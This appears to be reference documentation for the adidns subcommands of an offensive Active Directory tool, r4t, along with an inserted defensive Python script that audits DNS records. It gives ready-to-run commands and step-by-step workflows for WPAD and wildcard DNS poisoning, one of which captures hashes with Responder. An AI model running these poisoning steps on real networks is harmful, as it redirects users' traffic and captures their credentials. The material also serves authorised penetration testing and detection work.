adidns

Active Directory Integrated DNS (ADIDNS) enumeration and manipulation. ADIDNS stores DNS records directly as objects in Active Directory. By default, any authenticated domain user can add new records, making this a common vector for name poisoning attacks.

Usage

r4t adidns <subcommand> [flags]

Subcommands

adidns enum

Enumerate all ADIDNS records from Active Directory.

```bash
r4t adidns enum
```

Reads DNS node objects from the DomainDnsZones and/or ForestDnsZones application partitions in AD and displays all records. Results are stored in the dns_records table.
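As an added, defender-side example that is not part of r4t: the values that `adidns enum` reads are `dnsRecord` attribute blobs on dnsNode objects, stored in the DNS_RPC_RECORD layout from MS-DNSP (section 2.3.2.2). The Python below decodes such blobs and flags wildcard and wpad nodes for review; `build_a_record`, `audit_nodes` and the sample nodes are constructed here for illustration and assume no particular r4t output format.

```python
import struct
from ipaddress import IPv4Address

# DNS_RPC_RECORD (MS-DNSP 2.3.2.2) as stored in the dnsRecord attribute of a
# dnsNode object: 24-byte header followed by the record data. All integers are
# little-endian except TtlSeconds, which is big-endian.
# Added audit helper; not part of r4t.
DNS_TYPE_A = 0x0001
SUSPICIOUS_NAMES = {"*", "wpad"}  # wildcard and proxy auto-discovery names


def build_a_record(ip: str, ttl: int, serial: int = 1) -> bytes:
    """Constructed sample blob: an A record laid out the way AD DNS stores it."""
    data = IPv4Address(ip).packed
    # DataLength, Type, Version(5), Rank(0xF0 = zone), Flags, Serial
    header = struct.pack("<HHBBHI", len(data), DNS_TYPE_A, 5, 0xF0, 0, serial)
    # TtlSeconds (big-endian), Reserved(4), TimeStamp(4; 0 = static record)
    return header + struct.pack(">I", ttl) + b"\x00" * 8 + data


def parse_dns_record(blob: bytes) -> dict:
    """Decode one dnsRecord value; only A record data is rendered as an address."""
    data_len, rtype, _ver, _rank, _flags, serial = struct.unpack_from("<HHBBHI", blob, 0)
    ttl = struct.unpack_from(">I", blob, 12)[0]
    timestamp = struct.unpack_from("<I", blob, 20)[0]
    data = blob[24:24 + data_len]
    value = str(IPv4Address(data)) if rtype == DNS_TYPE_A else data.hex()
    return {"type": rtype, "ttl": ttl, "serial": serial,
            "static": timestamp == 0, "data": value}


def audit_nodes(nodes: list) -> list:
    """Return one finding per record whose node name is a wildcard or wpad."""
    findings = []
    for node in nodes:
        if node["dc"].lower() not in SUSPICIOUS_NAMES:
            continue
        for blob in node["dnsRecord"]:
            rec = parse_dns_record(blob)
            findings.append(f"{node['dc']} -> {rec['data']} "
                            f"(ttl={rec['ttl']}, type={rec['type']}, static={rec['static']})")
    return findings


# Constructed sample: dnsNode entries as an LDAP search of DomainDnsZones would return them.
SAMPLE_NODES = [
    {"dc": "fileserver", "dnsRecord": [build_a_record("10.0.0.5", 3600)]},
    {"dc": "wpad", "dnsRecord": [build_a_record("10.10.10.100", 180)]},
    {"dc": "*", "dnsRecord": [build_a_record("10.10.10.100", 180)]},
]

if __name__ == "__main__":
    for line in audit_nodes(SAMPLE_NODES):
        print(line)
```

A wpad or wildcard node that the DNS administrators did not create, especially one with the tool's default TTL of 180, is worth correlating with the object's creator in the AD change logs.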

adidns add

Add a new DNS record to ADIDNS.

```bash
# Add an A record pointing to attacker IP
r4t adidns add --record wpad --data 10.10.10.100

# Add a wildcard A record
r4t adidns add --record "*" --data 10.10.10.100

# Add a CNAME record
r4t adidns add --record malicious --type CNAME --data legitimate.corp.example.com

# Add to the forest DNS zone
r4t adidns add --record wpad --data 10.10.10.100 --forest

# Custom TTL
r4t adidns add --record wpad --data 10.10.10.100 --ttl 300

# Add an SRV record
r4t adidns add --record _custom._tcp --type SRV --data target.corp.example.com \
  --priority 10 --weight 100 --port 8080
```

| Flag | Short | Type | Description |
|---|---|---|---|
| --record | -r | string | Target record name (FQDN or relative name) [required] |
| --type | -t | string | Record type: A, AAAA, CNAME, SRV (default: A) |
| --data | -D | string | Record data (IP address, target hostname, etc.) [required] |
| --zone | | string | DNS zone (defaults to domain) |
| --forest | | bool | Use ForestDnsZones instead of DomainDnsZones |
| --legacy | | bool | Use the System partition (legacy DNS storage) |
| --allow-multiple | | bool | Allow multiple records with the same name |
| --ttl | | int | TTL in seconds (default: 180) |
| --dns-server | | string | DNS server IP for SOA serial lookup |
| --tcp | | bool | Use DNS over TCP for SOA lookup |
| --rpc | | bool | Use RPC instead of LDAP (not yet implemented) |
| --priority | | uint16 | SRV record priority |
| --weight | | uint16 | SRV record weight |
| --port | | uint16 | SRV record port |

adidns modify

Modify an existing ADIDNS record.

```bash
# Update an A record to a new IP
r4t adidns modify --record wpad --data 10.10.10.200

# Update in forest zone
r4t adidns modify --record wpad --data 10.10.10.200 --forest
```

Shares the same flags as adidns add, except that --allow-multiple is not available.

adidns remove

Remove (tombstone) an ADIDNS record.

```bash
# Remove a record
r4t adidns remove --record wpad

# Remove from a specific zone
r4t adidns remove --record wpad --zone corp.example.com
```

Tombstoning marks the record for deletion. The record is not immediately removed — AD replication handles cleanup.

| Flag | Short | Type | Description |
|---|---|---|---|
| --record | -r | string | Record name to remove [required] |
| --zone | | string | DNS zone |
| --forest | | bool | Use ForestDnsZones |
| --legacy | | bool | Use System partition |
| --dns-server | | string | DNS server for SOA lookup |
| --tcp | | bool | DNS over TCP |

adidns resurrect

Resurrect a tombstoned ADIDNS record.

```bash
r4t adidns resurrect --record wpad
```

Re-activates a previously tombstoned record. Uses the same flags as adidns remove.

adidns query

Query a specific ADIDNS record.

```bash
# Query an A record
r4t adidns query --record wpad

# Query with type filter
r4t adidns query --record _ldap._tcp --type SRV
```

| Flag | Short | Type | Description |
|---|---|---|---|
| --record | -r | string | Record name to query [required] |
| --type | -t | string | Record type filter |
| --zone | | string | DNS zone |
| --forest | | bool | Use ForestDnsZones |
| --legacy | | bool | Use System partition |
| --dns-server | | string | DNS server for SOA lookup |
| --tcp | | bool | DNS over TCP |

Common ADIDNS Attack Workflows

WPAD Poisoning

WPAD (Web Proxy Auto-Discovery) abuse via ADIDNS:

```bash
# 1. Check if wpad record exists
r4t adidns query --record wpad

# 2. Add a WPAD record pointing to attacker machine
r4t adidns add --record wpad --data 10.10.10.100

# 3. Start Responder on the attacker machine to capture hashes
# sudo responder -I eth0 -wP

# 4. Clean up after capture
r4t adidns remove --record wpad
```

Wildcard Record Poisoning

```bash
# Add wildcard — all unresolved names return attacker IP
r4t adidns add --record "*" --data 10.10.10.100 --allow-multiple

# Remove when done
r4t adidns remove --record "*"
```

DNS Record Storage

Enumerated records are stored in the dns_records table in SQLite.